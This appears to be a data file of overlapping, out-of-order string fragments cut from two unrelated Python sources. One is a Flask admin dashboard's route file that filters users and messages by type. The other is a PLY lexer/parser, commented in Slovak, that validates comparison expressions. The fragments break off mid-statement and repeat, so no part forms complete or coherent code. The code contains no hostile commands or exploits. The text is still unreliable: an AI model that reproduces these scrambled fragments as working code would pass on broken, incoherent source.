"#get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\")",
"find_current_msg(msgs):# # for msg in msgs: # if msg.current == True: # return",
"= db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def dashboard_show_reported_msgs(): #get all msgs for",
"dashboard_show_live_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html', msgs=msgs)",
"= \"Reported Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required def dashboard_show_banned_users(): users =",
"x:( #-x.important, #x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\", #x.id)) #for task in tasks: # if task.state",
"dashboard_show_reported_users(): users = db.session.query(User).filter(User.type==\"reported\") title = \"Reported Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_banned_users\")",
"with current=True #@app.route(\"/find_current_msg\") #def find_current_msg(msgs):# # for msg in msgs: # if msg.current",
"import SQLAlchemy from sqlalchemy import ( Table, Column, Integer, String, MetaData, ForeignKey, Boolean",
"def dashboard_show_admin_users(): users = db.session.query(User).filter(User.type==\"admin\") title = \"Admin Users\" return render_template('list/dashboard_users.html', users=users, title=title)",
"utf-8 -*- # \"\"\" routes.py: All Routes \"\"\" #Built-in/Generic import datetime #Libs from",
"for find all from list from msg_routes import * from user_routes import *",
"import datetime #Libs from flask import Flask, g, redirect, render_template, request, url_for, session,",
"num_users=num_users, num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required def dashboard_show_msgs(): #get all msgs for the",
"render_template('auth/index.html', msgs=msgs, current_msg=current_msg, num_users=num_users, num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required def dashboard_show_msgs(): #get all",
"import * from user_routes import * #needs to be above all functions that",
"for the user msgs, current_msg = get_msgs_and_current_msg() #if not current_msg: #--> return render_template('list/dashboard_msgs.html',",
"list_routes for find all from list from msg_routes import * from user_routes import",
"<filename>routes.py<gh_stars>0 #!interpreter [optional-arg] # -*- coding: utf-8 -*- # \"\"\" routes.py: All Routes",
"@app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def dashboard_show_reported_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"reported\")",
"all functions that use it??? def admin_login_required(f): @wraps(f) def decorated_function(): if g.user is",
"return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required def dashboard_show_reported_users(): users = db.session.query(User).filter(User.type==\"reported\") title =",
"msgs for the user msgs, current_msg = get_msgs_and_current_msg() return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required",
"return render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs) else: msgs, current_msg = get_msgs_and_current_msg() return render_template('auth/index.html', msgs=msgs, current_msg=current_msg,",
"= [], [], [] #tasks = Task.query.filter_by(parent_list=current_msg.id) #tasks = sorted(list(tasks), key=lambda x:( #-x.important,",
"import or_ #Modules from flask_app import db, app from models import User, Msg",
"flask_app import db, app from models import User, Msg import msg_routes, user_routes from",
"for msg in msgs: # if msg.current == True: # return msg #",
"else: # deleted.append(task) #current = sorted(current, key=lambda x:(-x.important, x.sort_value)) #return render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current,",
"#@app.route(\"/find_current_msg\") #def find_current_msg(msgs):# # for msg in msgs: # if msg.current == True:",
"key=lambda x:(-x.important, x.sort_value)) #return render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current, #filter=\"All\") #find the list with current=True",
"completed.append(task) # else: # deleted.append(task) #current = sorted(current, key=lambda x:(-x.important, x.sort_value)) #return render_template('list/dashboard_filter_all.html',",
"\"admin\": return redirect(url_for(\"dashboard_forbidden\")) return f() return decorated_function @app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg(): user = user_read(session['user_id'])",
"msgs, None#, current_msg @app.route(\"/\") def index(): num_users = db.session.query(User).count() num_msgs = db.session.query(Msg).count() if",
"session: return redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type != \"admin\": return redirect(url_for(\"dashboard_forbidden\")) return f() return decorated_function",
"these. #especially list_routes for find all from list from msg_routes import * from",
"def dashboard_show_all_users(): users = User.query.all() title = \"All Users\" return render_template('list/dashboard_users.html', users=users, title=title)",
"Main ######################################################################################## @app.route(\"/dashboard_forbidden\") def dashboard_forbidden(): return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def dashboard_error_404(): return render_template('list/error_404.html') @app.route(\"/dashboard\")",
"def admin_login_required(f): @wraps(f) def decorated_function(): if g.user is None or \"user_id\" not in",
"\"Online Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required def dashboard_show_admin_users(): users = db.session.query(User).filter(User.type==\"admin\")",
"def dashboard_show_live_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html',",
"return render_template('list/dashboard_users.html', users=users, title=title) # Main ######################################################################################## @app.route(\"/dashboard_forbidden\") def dashboard_forbidden(): return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\")",
"db.session.query(User).filter(User.online==True) title = \"Online Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required def dashboard_show_admin_users():",
"msgs, current_msg = get_msgs_and_current_msg() return render_template('auth/index.html', msgs=msgs, current_msg=current_msg, num_users=num_users, num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\")",
"num_users=num_users, num_msgs=num_msgs) else: msgs, current_msg = get_msgs_and_current_msg() return render_template('auth/index.html', msgs=msgs, current_msg=current_msg, num_users=num_users, num_msgs=num_msgs)",
"@app.route(\"/dashboard_forbidden\") def dashboard_forbidden(): return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def dashboard_error_404(): return render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required def",
"if 'user_id' not in session or not user_read(session['user_id']): return render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs) else:",
"#Libs from flask import Flask, g, redirect, render_template, request, url_for, session, flash from",
"# if task.state == \"current\": # current.append(task) # elif task.state == \"completed\": #",
"or not user_read(session['user_id']): return render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs) else: msgs, current_msg = get_msgs_and_current_msg() return",
"#return render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current, #filter=\"All\") #find the list with current=True #@app.route(\"/find_current_msg\") #def find_current_msg(msgs):#",
"db.session.query(User).filter(User.type==\"premium\") title = \"Premium Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required def dashboard_show_reported_users():",
"or_ #Modules from flask_app import db, app from models import User, Msg import",
"# deleted.append(task) #current = sorted(current, key=lambda x:(-x.important, x.sort_value)) #return render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current, #filter=\"All\")",
"render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required def dashboard_show_reported_users(): users = db.session.query(User).filter(User.type==\"reported\") title = \"Reported",
"User.query.all() title = \"All Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_online_users\") @admin_login_required def dashboard_show_online_users():",
"decorated_function(): if g.user is None or \"user_id\" not in session: return redirect(url_for(\"dashboard_forbidden\")) elif",
"render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required def dashboard_show_admin_users(): users = db.session.query(User).filter(User.type==\"admin\") title = \"Admin",
"all msgs for the user msgs, current_msg = get_msgs_and_current_msg() #if not current_msg: #-->",
"db.session.query(User).filter(User.type==\"admin\") title = \"Admin Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required def dashboard_show_premium_users():",
"!= \"admin\": return redirect(url_for(\"dashboard_forbidden\")) return f() return decorated_function @app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg(): user =",
"#!interpreter [optional-arg] # -*- coding: utf-8 -*- # \"\"\" routes.py: All Routes \"\"\"",
"ForeignKey, Boolean ) from sqlalchemy import or_ #Modules from flask_app import db, app",
"dashboard_show_admin_users(): users = db.session.query(User).filter(User.type==\"admin\") title = \"Admin Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_premium_users\")",
"num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required def dashboard_show_msgs(): #get all msgs for the user",
"# for msg in msgs: # if msg.current == True: # return msg",
"@app.route(\"/\") def index(): num_users = db.session.query(User).count() num_msgs = db.session.query(Msg).count() if 'user_id' not in",
"== \"completed\": # completed.append(task) # else: # deleted.append(task) #current = sorted(current, key=lambda x:(-x.important,",
"Task.query.filter_by(parent_list=current_msg.id) #tasks = sorted(list(tasks), key=lambda x:( #-x.important, #x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\", #x.id)) #for task",
"else: msgs, current_msg = get_msgs_and_current_msg() return render_template('auth/index.html', msgs=msgs, current_msg=current_msg, num_users=num_users, num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@",
"get_msgs_and_current_msg(): user = user_read(session['user_id']) msgs = Msg.query.all() #current_msg = find_current_msg(msgs) return msgs, None#,",
"users=users, title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required def dashboard_show_premium_users(): users = db.session.query(User).filter(User.type==\"premium\") title = \"Premium Users\"",
"#current=current, #filter=\"All\") #find the list with current=True #@app.route(\"/find_current_msg\") #def find_current_msg(msgs):# # for msg",
"#get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\")",
"import ( Table, Column, Integer, String, MetaData, ForeignKey, Boolean ) from sqlalchemy import",
"@admin_login_required def dashboard_show_msgs(): #get all msgs for the user msgs, current_msg = get_msgs_and_current_msg()",
"users = db.session.query(User).filter(User.type==\"admin\") title = \"Admin Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required",
"users = db.session.query(User).filter(User.type==\"banned\") title = \"Banned Users\" return render_template('list/dashboard_users.html', users=users, title=title) # Main",
"Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required def dashboard_show_admin_users(): users = db.session.query(User).filter(User.type==\"admin\") title",
"\"Banned Users\" return render_template('list/dashboard_users.html', users=users, title=title) # Main ######################################################################################## @app.route(\"/dashboard_forbidden\") def dashboard_forbidden(): return",
"def dashboard_show_online_users(): users = db.session.query(User).filter(User.online==True) title = \"Online Users\" return render_template('list/dashboard_users.html', users=users, title=title)",
"\"user_id\" not in session: return redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type != \"admin\": return redirect(url_for(\"dashboard_forbidden\")) return",
"#get all msgs for the user msgs, current_msg = get_msgs_and_current_msg() #if not current_msg:",
"def dashboard_show_premium_users(): users = db.session.query(User).filter(User.type==\"premium\") title = \"Premium Users\" return render_template('list/dashboard_users.html', users=users, title=title)",
"return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_live_msgs\") @admin_login_required def dashboard_show_live_msgs(): #get all msgs for the user",
"users=users, title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required def dashboard_show_reported_users(): users = db.session.query(User).filter(User.type==\"reported\") title = \"Reported Users\"",
"######################################################################################## @app.route(\"/dashboard_forbidden\") def dashboard_forbidden(): return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def dashboard_error_404(): return render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required",
"-*- coding: utf-8 -*- # \"\"\" routes.py: All Routes \"\"\" #Built-in/Generic import datetime",
"def decorated_function(): if g.user is None or \"user_id\" not in session: return redirect(url_for(\"dashboard_forbidden\"))",
"def dashboard_error_404(): return render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required def dashboard(): #get all msgs for the",
"functools import wraps #for some reason I need to also import all from",
"in session: return redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type != \"admin\": return redirect(url_for(\"dashboard_forbidden\")) return f() return",
"user msgs = db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html', msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required def dashboard_show_all_users():",
"msgs = db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def dashboard_show_waiting_msgs(): #get all msgs",
"return render_template('list/dashboard_msgs.html', msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required def dashboard_show_all_users(): users = User.query.all() title",
"user_read(session['user_id']): return render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs) else: msgs, current_msg = get_msgs_and_current_msg() return render_template('auth/index.html', msgs=msgs,",
"index(): num_users = db.session.query(User).count() num_msgs = db.session.query(Msg).count() if 'user_id' not in session or",
"return redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type != \"admin\": return redirect(url_for(\"dashboard_forbidden\")) return f() return decorated_function @app.route(\"/get_msgs_and_current_msg\")",
"[] #tasks = Task.query.filter_by(parent_list=current_msg.id) #tasks = sorted(list(tasks), key=lambda x:( #-x.important, #x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\",",
"msg in msgs: # if msg.current == True: # return msg # return",
"all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required",
"not user_read(session['user_id']): return render_template('auth/index.html', num_users=num_users, num_msgs=num_msgs) else: msgs, current_msg = get_msgs_and_current_msg() return render_template('auth/index.html',",
"all from list from msg_routes import * from user_routes import * #needs to",
"admin_login_required(f): @wraps(f) def decorated_function(): if g.user is None or \"user_id\" not in session:",
"sorted(current, key=lambda x:(-x.important, x.sort_value)) #return render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current, #filter=\"All\") #find the list with",
"num_msgs = db.session.query(Msg).count() if 'user_id' not in session or not user_read(session['user_id']): return render_template('auth/index.html',",
"db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def dashboard_show_waiting_msgs(): #get all msgs for the",
"it??? def admin_login_required(f): @wraps(f) def decorated_function(): if g.user is None or \"user_id\" not",
"current_msg=current_msg, num_users=num_users, num_msgs=num_msgs) #Messages @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @app.route(\"/dashboard_show_msgs\") @admin_login_required def dashboard_show_msgs(): #get all msgs for",
"import db, app from models import User, Msg import msg_routes, user_routes from functools",
"all from each of these. #especially list_routes for find all from list from",
"I need to also import all from each of these. #especially list_routes for",
"#find the list with current=True #@app.route(\"/find_current_msg\") #def find_current_msg(msgs):# # for msg in msgs:",
"# else: # deleted.append(task) #current = sorted(current, key=lambda x:(-x.important, x.sort_value)) #return render_template('list/dashboard_filter_all.html', #msgs=msgs,",
"def dashboard(): #get all msgs for the user msgs, current_msg = get_msgs_and_current_msg() #if",
"Boolean ) from sqlalchemy import or_ #Modules from flask_app import db, app from",
"def get_msgs_and_current_msg(): user = user_read(session['user_id']) msgs = Msg.query.all() #current_msg = find_current_msg(msgs) return msgs,",
"#current = sorted(current, key=lambda x:(-x.important, x.sort_value)) #return render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current, #filter=\"All\") #find the",
"Table, Column, Integer, String, MetaData, ForeignKey, Boolean ) from sqlalchemy import or_ #Modules",
"need to also import all from each of these. #especially list_routes for find",
"msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def",
"= Task.query.filter_by(parent_list=current_msg.id) #tasks = sorted(list(tasks), key=lambda x:( #-x.important, #x.state==\"deleted\", #x.state==\"current\", #x.state==\"completed\", #x.id)) #for",
"user_read(session['user_id']) msgs = Msg.query.all() #current_msg = find_current_msg(msgs) return msgs, None#, current_msg @app.route(\"/\") def",
"title = \"Premium Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_reported_users\") @admin_login_required def dashboard_show_reported_users(): users",
"msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html', msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\")",
"title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required def dashboard_show_premium_users(): users = db.session.query(User).filter(User.type==\"premium\") title = \"Premium Users\" return",
"user msgs = db.session.query(Msg).filter(Msg.type==\"live\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def dashboard_show_waiting_msgs(): #get all",
"return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required def dashboard_show_banned_users(): users = db.session.query(User).filter(User.type==\"banned\") title =",
"from sqlalchemy import or_ #Modules from flask_app import db, app from models import",
"user = user_read(session['user_id']) msgs = Msg.query.all() #current_msg = find_current_msg(msgs) return msgs, None#, current_msg",
"* #needs to be above all functions that use it??? def admin_login_required(f): @wraps(f)",
"db, app from models import User, Msg import msg_routes, user_routes from functools import",
"@app.route(\"/get_msgs_and_current_msg\") def get_msgs_and_current_msg(): user = user_read(session['user_id']) msgs = Msg.query.all() #current_msg = find_current_msg(msgs) return",
"db.session.query(Msg).filter(Msg.type==\"waiting\") return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def dashboard_show_reported_msgs(): #get all msgs for the",
"msgs, current_msg = get_msgs_and_current_msg() #if not current_msg: #--> return render_template('list/dashboard_msgs.html', msgs=msgs) #current, completed,",
"#x.state==\"current\", #x.state==\"completed\", #x.id)) #for task in tasks: # if task.state == \"current\": #",
"@app.route(\"/dashboard_show_waiting_msgs\") @admin_login_required def dashboard_show_waiting_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"waiting\")",
"title=title) # Main ######################################################################################## @app.route(\"/dashboard_forbidden\") def dashboard_forbidden(): return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def dashboard_error_404(): return",
"from models import User, Msg import msg_routes, user_routes from functools import wraps #for",
"also import all from each of these. #especially list_routes for find all from",
"not in session: return redirect(url_for(\"dashboard_forbidden\")) elif user_read(session['user_id']).type != \"admin\": return redirect(url_for(\"dashboard_forbidden\")) return f()",
"= db.session.query(User).filter(User.type==\"banned\") title = \"Banned Users\" return render_template('list/dashboard_users.html', users=users, title=title) # Main ########################################################################################",
"users=users, title=title) @app.route(\"/dashboard_show_banned_users\") @admin_login_required def dashboard_show_banned_users(): users = db.session.query(User).filter(User.type==\"banned\") title = \"Banned Users\"",
"the user msgs, current_msg = get_msgs_and_current_msg() #if not current_msg: #--> return render_template('list/dashboard_msgs.html', msgs=msgs)",
"import * #needs to be above all functions that use it??? def admin_login_required(f):",
"models import User, Msg import msg_routes, user_routes from functools import wraps #for some",
"return render_template('list/dashboard_msgs.html', msgs=msgs) @app.route(\"/dashboard_show_reported_msgs\") @admin_login_required def dashboard_show_reported_msgs(): #get all msgs for the user",
"= user_read(session['user_id']) msgs = Msg.query.all() #current_msg = find_current_msg(msgs) return msgs, None#, current_msg @app.route(\"/\")",
"msg_routes, user_routes from functools import wraps #for some reason I need to also",
"# completed.append(task) # else: # deleted.append(task) #current = sorted(current, key=lambda x:(-x.important, x.sort_value)) #return",
"g, redirect, render_template, request, url_for, session, flash from flask_sqlalchemy import SQLAlchemy from sqlalchemy",
"dashboard_forbidden(): return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def dashboard_error_404(): return render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required def dashboard(): #get",
"find all from list from msg_routes import * from user_routes import * #needs",
"request, url_for, session, flash from flask_sqlalchemy import SQLAlchemy from sqlalchemy import ( Table,",
"== \"current\": # current.append(task) # elif task.state == \"completed\": # completed.append(task) # else:",
"None#, current_msg @app.route(\"/\") def index(): num_users = db.session.query(User).count() num_msgs = db.session.query(Msg).count() if 'user_id'",
"render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current, #filter=\"All\") #find the list with current=True #@app.route(\"/find_current_msg\") #def find_current_msg(msgs):# #",
"#def find_current_msg(msgs):# # for msg in msgs: # if msg.current == True: #",
"= db.session.query(User).filter(User.type==\"admin\") title = \"Admin Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required def",
"# \"\"\" routes.py: All Routes \"\"\" #Built-in/Generic import datetime #Libs from flask import",
"= find_current_msg(msgs) return msgs, None#, current_msg @app.route(\"/\") def index(): num_users = db.session.query(User).count() num_msgs",
"if task.state == \"current\": # current.append(task) # elif task.state == \"completed\": # completed.append(task)",
"-*- # \"\"\" routes.py: All Routes \"\"\" #Built-in/Generic import datetime #Libs from flask",
"= db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html', msgs=msgs) #Users $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ @app.route(\"/dashboard_show_all_users\") @admin_login_required def dashboard_show_all_users(): users =",
"return render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required def dashboard(): #get all msgs for the user msgs,",
"some reason I need to also import all from each of these. #especially",
"render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required def dashboard_show_premium_users(): users = db.session.query(User).filter(User.type==\"premium\") title = \"Premium",
"title = \"Online Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_admin_users\") @admin_login_required def dashboard_show_admin_users(): users",
"\"current\": # current.append(task) # elif task.state == \"completed\": # completed.append(task) # else: #",
"Users\" return render_template('list/dashboard_users.html', users=users, title=title) @app.route(\"/dashboard_show_premium_users\") @admin_login_required def dashboard_show_premium_users(): users = db.session.query(User).filter(User.type==\"premium\") title",
"render_template('list/dashboard_users.html', users=users, title=title) # Main ######################################################################################## @app.route(\"/dashboard_forbidden\") def dashboard_forbidden(): return render_template('list/forbidden.html') @app.route(\"/dashboard_error_404\") def",
"x.sort_value)) #return render_template('list/dashboard_filter_all.html', #msgs=msgs, #current=current, #filter=\"All\") #find the list with current=True #@app.route(\"/find_current_msg\") #def",
"* from user_routes import * #needs to be above all functions that use",
"#get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html', msgs=msgs) #Users",
"render_template('list/error_404.html') @app.route(\"/dashboard\") @admin_login_required def dashboard(): #get all msgs for the user msgs, current_msg",
"@app.route(\"/dashboard_show_online_users\") @admin_login_required def dashboard_show_online_users(): users = db.session.query(User).filter(User.online==True) title = \"Online Users\" return render_template('list/dashboard_users.html',",
"num_users = db.session.query(User).count() num_msgs = db.session.query(Msg).count() if 'user_id' not in session or not",
"import wraps #for some reason I need to also import all from each",
"\"completed\": # completed.append(task) # else: # deleted.append(task) #current = sorted(current, key=lambda x:(-x.important, x.sort_value))",
"def dashboard_show_reported_msgs(): #get all msgs for the user msgs = db.session.query(Msg).filter(Msg.type==\"reported\") return render_template('list/dashboard_msgs.html',"
] |
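The row above shreds a Flask `routes.py` into overlapping shingles. The one piece worth pulling back out is the `admin_login_required` decorator that guards every dashboard view; a minimal sketch reassembled from the shingles follows. `user_read` is the app's own session-to-User helper and is assumed here, not defined in the snippet; the original wrapper took no arguments (so it only fit zero-argument views), and `*args`/`**kwargs` are added to generalize it.

```python
# Sketch reassembled from the shingles above; user_read is the app's own
# helper (assumed), not defined in this snippet.
from functools import wraps
from flask import g, redirect, session, url_for

def admin_login_required(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):  # original took no args; generalized here
        # Reject anonymous sessions outright, then non-admin accounts.
        if g.user is None or "user_id" not in session:
            return redirect(url_for("dashboard_forbidden"))
        if user_read(session["user_id"]).type != "admin":
            return redirect(url_for("dashboard_forbidden"))
        return f(*args, **kwargs)
    return decorated_function
```

Each guarded view then just filters and renders the shared template, e.g. `msgs = db.session.query(Msg).filter(Msg.type == "live")` for the live-message dashboard.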
[
"p_exp2(p): '''exp2 : '+' x exp2 | '-' x exp2 | '*' x",
"inak True def myparse(expression): lexer = lex.lex() parser = yacc.yacc(debug=False) # vypnutie debugovacieho",
"'''inp : exp '>' exp | exp '<' exp | exp GRE exp",
"reset flagu return False if not tok: break # syntakticka kontrola parser.parse(expression) if",
"definicie tokenov tokens = ( 'STRING', 'NUMBER', 'FIELD', 'GRE', 'LOE', 'EQ', 'NEQ', )",
"= '<=' t_EQ = '==' t_NEQ = '!=' t_ignore = \" \\t\" def",
"premenna na urcenie chyby def p_error(p): if p: print(\"Syntakticka chyba pri '%s'\" %",
"ak chyba v gramatike vypise sa chyba, nastavi sa globalna premenna na urcenie",
"NEQ exp | exp EQ exp''' def p_exp(p): '''exp : STRING | x",
"= '==' t_NEQ = '!=' t_ignore = \" \\t\" def t_NUMBER(t): r'\\d+' t.value",
"pridanie fieldu do listu fieldov # ak chyba v gramatike vypise sa chyba,",
"'''exp : STRING | x exp2''' def p_exp2(p): '''exp2 : '+' x exp2",
"= int(t.value) return t # chybny token def t_error(t): print(\"Nepodporovany znak '%s'\" %",
"parseru # vstupom je vyraz, pri lexikalnej alebo syntaktickej chybe vrati False, inak",
"'*' x exp2 | '/' x exp2 | ''' def p_x1(p): '''x :",
"chyba pri EOF\") global_var.parseerror = True # funkcia na zostavenie lexemu a parseru",
"True # funkcia na zostavenie lexemu a parseru # vstupom je vyraz, pri",
"# ak chyba v gramatike vypise sa chyba, nastavi sa globalna premenna na",
"break # syntakticka kontrola parser.parse(expression) if global_var.parseerror: # ak chyba global_var.parseerror = False",
"exp2 | '*' x exp2 | '/' x exp2 | ''' def p_x1(p):",
"# vstupom je vyraz, pri lexikalnej alebo syntaktickej chybe vrati False, inak True",
"suboru # kontrola lexemov lexer.input(expression) while True: tok = lexer.token() if global_var.parseerror: #",
"if not tok: break # syntakticka kontrola parser.parse(expression) if global_var.parseerror: # ak chyba",
"'%s'\" % p.value) global_var.parseerror = True else: print(\"Syntakticka chyba pri EOF\") global_var.parseerror =",
"exp2''' def p_exp2(p): '''exp2 : '+' x exp2 | '-' x exp2 |",
"literaly literals = ['+', '-', '*', '/', '>', '<'] # popis tokenov t_FIELD",
"= lexer.token() if global_var.parseerror: # ak chyba global_var.parseerror = False # reset flagu",
"# chybny token def t_error(t): print(\"Nepodporovany znak '%s'\" % t.value[0]) global_var.parseerror = True",
"global_var.fields.append(p[1]) # pridanie fieldu do listu fieldov # ak chyba v gramatike vypise",
"'*', '/', '>', '<'] # popis tokenov t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING = r'\\\".*\\\"'",
"# funkcia na zostavenie lexemu a parseru # vstupom je vyraz, pri lexikalnej",
"lexikalnej alebo syntaktickej chybe vrati False, inak True def myparse(expression): lexer = lex.lex()",
"global_var.parseerror = False # reset flagu return False if not tok: break #",
"funkcia na zostavenie lexemu a parseru # vstupom je vyraz, pri lexikalnej alebo",
"exp NEQ exp | exp EQ exp''' def p_exp(p): '''exp : STRING |",
"NUMBER''' def p_x2(p): '''x : FIELD''' global_var.fields.append(p[1]) # pridanie fieldu do listu fieldov",
"zostavenie lexemu a parseru # vstupom je vyraz, pri lexikalnej alebo syntaktickej chybe",
"''' def p_x1(p): '''x : NUMBER''' def p_x2(p): '''x : FIELD''' global_var.fields.append(p[1]) #",
"vyraz, pri lexikalnej alebo syntaktickej chybe vrati False, inak True def myparse(expression): lexer",
